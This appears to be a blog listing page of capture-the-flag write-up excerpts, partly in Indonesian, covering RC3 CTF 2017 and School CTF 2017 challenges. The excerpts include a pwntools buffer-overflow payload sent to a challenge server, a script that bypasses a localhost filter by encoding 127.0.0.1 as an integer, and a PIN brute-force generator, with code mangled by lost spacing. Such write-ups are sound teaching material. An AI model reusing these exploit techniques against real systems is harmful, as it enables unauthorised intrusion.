Pwnable.tw - Start (100)

Read more →

RC3 CTF 2017 - Write Up

v2 = 0; v1 = 0; printf(“Enter Key: “); gets((char *)&v0); if ( v2 == 0xCAFEF00D && v1 == 0xC0FFEE ) sub_80484EF(); puts(“Error: Invalid key!"); srand(1u); init(); } baby=remote("18.216.183.46",4200)p="“p+="A"*16p+=p32(0xC0FFEE)# v1p+=p32(0xCAFEF00D)# v2baby.sendlineafter(”: “,p)printbaby.
Read more →

RC3 CTF 2017 Write Up

Reversing (100) Diberikan file elf 64bit not stripped. $ file hello hello: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=e85915bc2c95f7eac6c02254b065d9161e5efca2, not stripped Hanya dengan menggunakan strings didapatkan Flag yang benar. $ strings hello | grep RC RC3-2017{little_ball_of_fur} Cukup mudah untuk challenge dengan points 100 :) Flag : RC3-2017{little_ball_of_fur} Web (100) Diberikan sebuah website http://13.59.6.98 $ curl http://13.59.6.98 <meta http-equiv="refresh" content="0; url=C.html" /> <p hidden>R</p> Website tersebut akan otomatis direfresh apabila dikunjungi via Browser.
Read more →

RC3 CTF 2017 Write Up

Reversing (100) Diberikan file elf 64bit not stripped. $ file hello hello: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=e85915bc2c95f7eac6c02254b065d9161e5efca2, not stripped Hanya dengan menggunakan strings didapatkan Flag yang benar. $ strings hello | grep RC RC3-2017{little_ball_of_fur} Cukup mudah untuk challenge dengan points 100 :) Flag : RC3-2017{little_ball_of_fur} Web (100) Diberikan sebuah website ()[http://13.59.6.98] $ curl http://13.59.6.98 <meta http-equiv="refresh" content="0; url=C.html" /> <p hidden>R</p> Website tersebut akan otomatis direfresh apabila dikunjungi via Browser.
Read more →

School CTF 2017 - Write Up

Task URLCan you find it? Task URLdefip2long(ip): aton =inet_aton(ip) returnunpack(”!L",aton)[0] defmain(): URL ="http://portscan.task.school-CTF.org/port"IP ="127.0.0.1"HOST =ip2long(IP) PORT ="31337"print"Host : {}“.format(HOST) r =requests.post(URL,data={"host": HOST,"port": PORT}) raw_content =r.content flag =re.findall("SchoolCTF{.*?}“,raw_content) print"Flag : {}“.format(flag[0]) if__name__==’main‘: main() p.s. It seems that one of them said that they haven’t yet fully configured the security system and the password can be cracked. Safe URLdefa(pin): if(int(pin[0]) +int(pin[1]) +int(pin[2])) %10==int(pin[3]): returnpin else: returnNonepin_list =[] prod_pin =product("123456789",repeat=4) prod_pin =["“.join(x) forx inlist(prod_pin)] prod_pin =map(a,prod_pin) prod_pin =filter(None,prod_pin) prod_pin =list(set(prod_pin)) pin_list+=prod_pin
Read more →